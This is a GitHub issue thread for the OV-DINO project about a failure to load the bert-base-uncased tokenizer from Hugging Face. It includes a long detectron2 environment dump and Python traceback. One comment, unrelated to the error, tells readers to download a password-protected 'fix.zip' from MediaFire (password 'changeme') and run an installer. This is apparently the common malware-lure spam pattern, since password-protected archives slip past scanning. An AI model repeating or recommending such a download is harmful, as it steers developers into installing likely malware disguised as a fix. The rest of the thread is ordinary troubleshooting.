### ISSUE TITLE
 couldn't connect to 'https://huggingface.co' to load this file

### ISSUE THREAD

**Issue by ranshaobagemen** [wanghao9610/OV-DINO#32]
OSError: We couldn't connect to 'https://huggingface.co' to load this file, couldn't find it in the cached files and it looks like bert-base-uncased is not the path to a directory containing a file named config.json.
Checkout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.

If I directly specify the path of bert base truncated, an error will occur and the local connection cannot be made https://huggingface.co May I ask how I can solve it

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ryanz2023** [comment]
@wanghao9610 It's still not working:(
My error log: 
```
Distributed Testing on coco                                                                                                                                                                                                                                                                                   
/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/timm/models/layers/__init__.py:48: FutureWarning: Importing from timm.models.layers is deprecated, please import via timm.layers
  warnings.warn(f"Importing from {__name__} is deprecated, please import via timm.layers", FutureWarning)
dist_args: --nproc_per_node=1
[02/04 07:48:42 detectron2]: Rank of current process: 0. World size: 1
[02/04 07:48:43 detectron2]: Environment info:
----------------------  ----------------------------------------------------------------------------------
sys.platform            linux
Python                  3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0]
numpy                   1.26.4
detectron2              0.6 @/home/ryanz/OV-DINO/ovdino/detectron2-717ab9/detectron2
Compiler                GCC 9.5
CUDA compiler           CUDA 11.6
detectron2 arch flags   8.6
DETECTRON2_ENV_MODULE   <not set>
PyTorch                 1.13.1 @/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/torch
PyTorch debug build     False
GPU available           Yes
GPU 0                   NVIDIA RTX 4000 SFF Ada Generation (arch=8.9)
Driver version          535.183.01
CUDA_HOME               /usr/local/cuda
Pillow                  9.2.0
torchvision             0.14.1 @/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/torchvision
torchvision arch flags  3.5, 5.0, 6.0, 7.0, 7.5, 8.0, 8.6
fvcore                  0.1.5.post20221221
iopath                  0.1.9
cv2                     4.11.0
----------------------  ----------------------------------------------------------------------------------
PyTorch built with:
  - GCC 9.3
  - C++ Version: 201402
  - Intel(R) oneAPI Math Kernel Library Version 2023.1-Product Build 20230303 for Intel(R) 64 architecture applications
  - Intel(R) MKL-DNN v2.6.0 (Git Hash 52b5f107dd9cf10910aaa19cb47f3abf9b349815)
  - OpenMP 201511 (a.k.a. OpenMP 4.5)
  - LAPACK is enabled (usually provided by MKL)
  - NNPACK is enabled
  - CPU capability usage: AVX2
  - CUDA Runtime 11.6
  - NVCC architecture flags: -gencode;arch=compute_37,code=sm_37;-gencode;arch=compute_50,code=sm_50;-gencode;arch=compute_60,code=sm_60;-gencode;arch=compute_61,code=sm_61;-gencode;arch=compute_70,code=sm_70;-gencode;arch=compute_75,code=sm_75;-gencode;arch=compute_80,code=sm_80;-gencode;arch=compute_86,code=sm_86;-gencode;arch=compute_37,code=compute_37
  - CuDNN 8.3.2  (built against CUDA 11.5)
  - Magma 2.6.1
  - Build settings: BLAS_INFO=mkl, BUILD_TYPE=Release, CUDA_VERSION=11.6, CUDNN_VERSION=8.3.2, CXX_COMPILER=/opt/rh/devtoolset-9/root/usr/bin/c++, CXX_FLAGS= -fabi-version=11 -Wno-deprecated -fvisibility-inlines-hidden -DUSE_PTHREADPOOL -fopenmp -DNDEBUG -DUSE_KINETO -DUSE_FBGEMM -DUSE_QNNPACK -DUSE_PYTORCH_QNNPACK -DUSE_XNNPACK -DSYMBOLICATE_MOBILE_DEBUG_HANDLE -DEDGE_PROFILER_USE_KINETO -O2 -fPIC -Wno-narrowing -Wall -Wextra -Werror=return-type -Werror=non-virtual-dtor -Wno-missing-field-initializers -Wno-type-limits -Wno-array-bounds -Wno-unknown-pragmas -Wunused-local-typedefs -Wno-unused-parameter -Wno-unused-function -Wno-unused-result -Wno-strict-overflow -Wno-strict-aliasing -Wno-error=deprecated-declarations -Wno-stringop-overflow -Wno-psabi -Wno-error=pedantic -Wno-error=redundant-decls -Wno-error=old-style-cast -fdiagnostics-color=always -faligned-new -Wno-unused-but-set-variable -Wno-maybe-uninitialized -fno-math-errno -fno-trapping-math -Werror=format -Werror=cast-function-type -Wno-stringop-overflow, LAPACK_INFO=mkl, PERF_WITH_AVX=1, PERF_WITH_AVX2=1, PERF_WITH_AVX512=1, TORCH_VERSION=1.13.1, USE_CUDA=ON, USE_CUDNN=ON, USE_EXCEPTION_PTR=1, USE_GFLAGS=OFF, USE_GLOG=OFF, USE_MKL=ON, USE_MKLDNN=ON, USE_MPI=OFF, USE_NCCL=ON, USE_NNPACK=ON, USE_OPENMP=ON, USE_ROCM=OFF, 

[02/04 07:48:43 detectron2]: Command line arguments: Namespace(config_file='projects/ovdino/configs/ovdino_swin_tiny224_bert_base_eval_coco.py', resume=True, eval_only=True, num_gpus=1, num_machines=1, machine_rank=0, dist_url='tcp://127.0.0.1:50152', opts=['train.init_checkpoint=/home/ryanz/OV-DINO/ovdino/ovdino_swint_ogc-coco50.2_lvismv40.1_lvis32.9.pth', 'train.output_dir=../wkdrs/eval_ovdino', 'dataloader.evaluator.output_dir=../wkdrs/eval_ovdino/eval_coco_20250204-074841'])
[02/04 07:48:43 detectron2]: Contents of args.config_file=projects/ovdino/configs/ovdino_swin_tiny224_bert_base_eval_coco.py:
import os
import os.path as osp

from detrex.config import get_config

from .models.ovdino_swin_tiny224_bert_base import model

model_root = os.getenv("MODEL_ROOT", "./inits")
init_checkpoint = osp.join(model_root, "./swin", "swin_tiny_patch4_window7_224.pth")

# get default config
dataloader = get_config("common/data/coco_ovd.py").dataloader
optimizer = get_config("common/optim.py").AdamW
lr_multiplier = get_config("common/coco_schedule.py").lr_multiplier_12ep
train = get_config("common/train.py").train

# modify training config
train.init_checkpoint = init_checkpoint
train.output_dir = "./wkdrs/ovdino_swin_tiny224_bert_base_24ep"

# max training iterations
train.max_iter = 90000
train.eval_period = 5000
train.log_period = 50
train.checkpointer.period = 5000

# gradient clipping for training
train.clip_grad.enabled = True
train.clip_grad.params.max_norm = 0.1
train.clip_grad.params.norm_type = 2

# set training devices
train.device = "cuda"
model.device = train.device
model.inference_template = "full"

# modify optimizer config
optimizer.lr = 1e-4
optimizer.betas = (0.9, 0.999)
optimizer.weight_decay = 1e-4
optimizer.params.lr_factor_func = lambda module_name: (
    0.1 if "backbone" in module_name else 1
)

# modify dataloader config
dataloader.train.num_workers = 16

# please notice that this is total batch size.
# surpose you're using 4 gpus for training and the batch size for
# each gpu is 16/4 = 4
dataloader.train.total_batch_size = 16

# dump the testing results into output_dir for visualization
dataloader.evaluator.output_dir = train.output_dir

WARNING [02/04 07:48:43 d2.config.lazy]: The config contains objects that cannot serialize to a valid yaml. ../wkdrs/eval_ovdino/config.yaml is human-readable but cannot be loaded.
WARNING [02/04 07:48:43 d2.config.lazy]: Config is saved using cloudpickle at ../wkdrs/eval_ovdino/config.yaml.pkl.
[02/04 07:48:43 detectron2]: Full config saved to ../wkdrs/eval_ovdino/config.yaml
[02/04 07:48:43 d2.utils.env]: Using a generated random seed 43570147
/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/torch/functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at /opt/conda/conda-bld/pytorch_1670525552843/work/aten/src/ATen/native/TensorShape.cpp:3190.)
  return _VF.meshgrid(tensors, **kwargs)  # type: ignore[attr-defined]
/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/huggingface_hub/file_download.py:795: FutureWarning: `resume_download` is deprecated and will be removed in version 1.0.0. Downloads always resume when possible. If you want to force a new download, use `force_download=True`.
  warnings.warn(
Traceback (most recent call last):
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/utils/hub.py", line 417, in cached_file
    resolved_file = hf_hub_download(
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py", line 114, in _inner_fn
    return fn(*args, **kwargs)
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/huggingface_hub/file_download.py", line 860, in hf_hub_download
    return _hf_hub_download_to_cache_dir(
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/huggingface_hub/file_download.py", line 967, in _hf_hub_download_to_cache_dir
    _raise_on_head_call_error(head_call_error, force_download, local_files_only)
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/huggingface_hub/file_download.py", line 1476, in _raise_on_head_call_error
    raise LocalEntryNotFoundError(
huggingface_hub.errors.LocalEntryNotFoundError: Cannot find the requested files in the disk cache and outgoing traffic has been disabled. To enable hf.co look-ups and downloads online, set 'local_files_only' to False.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/ryanz/OV-DINO/ovdino/./tools/train_net.py", line 330, in <module>
    launch(
  File "/home/ryanz/OV-DINO/ovdino/detectron2-717ab9/detectron2/engine/launch.py", line 82, in launch
    main_func(*args)
  File "/home/ryanz/OV-DINO/ovdino/./tools/train_net.py", line 304, in main
    model = instantiate(cfg.model)
  File "/home/ryanz/OV-DINO/ovdino/detectron2-717ab9/detectron2/config/instantiate.py", line 67, in instantiate
    cfg = {k: instantiate(v) for k, v in cfg.items()}
  File "/home/ryanz/OV-DINO/ovdino/detectron2-717ab9/detectron2/config/instantiate.py", line 67, in <dictcomp>
    cfg = {k: instantiate(v) for k, v in cfg.items()}
  File "/home/ryanz/OV-DINO/ovdino/detectron2-717ab9/detectron2/config/instantiate.py", line 83, in instantiate
    return cls(**cfg)
  File "/home/ryanz/OV-DINO/ovdino/detrex/modeling/language_backbone/bert.py", line 99, in __init__
    self.tokenizer = BERTTokenizer(**tokenizer_cfg)
  File "/home/ryanz/OV-DINO/ovdino/detrex/modeling/language_backbone/bert.py", line 40, in __init__
    self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/models/auto/tokenization_auto.py", line 658, in from_pretrained
    config = AutoConfig.from_pretrained(
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/models/auto/configuration_auto.py", line 944, in from_pretrained
    config_dict, unused_kwargs = PretrainedConfig.get_config_dict(pretrained_model_name_or_path, **kwargs)
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/configuration_utils.py", line 574, in get_config_dict
    config_dict, kwargs = cls._get_config_dict(pretrained_model_name_or_path, **kwargs)
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/configuration_utils.py", line 629, in _get_config_dict
    resolved_config_file = cached_file(
  File "/home/ryanz/anaconda3/envs/ovdino/lib/python3.10/site-packages/transformers/utils/hub.py", line 452, in cached_file
    raise EnvironmentError(
OSError: We couldn't connect to 'https://hf-mirror.com' to load this file, couldn't find it in the cached files and it looks like bert-base-uncased is not the path to a directory containing a file named config.json.
```
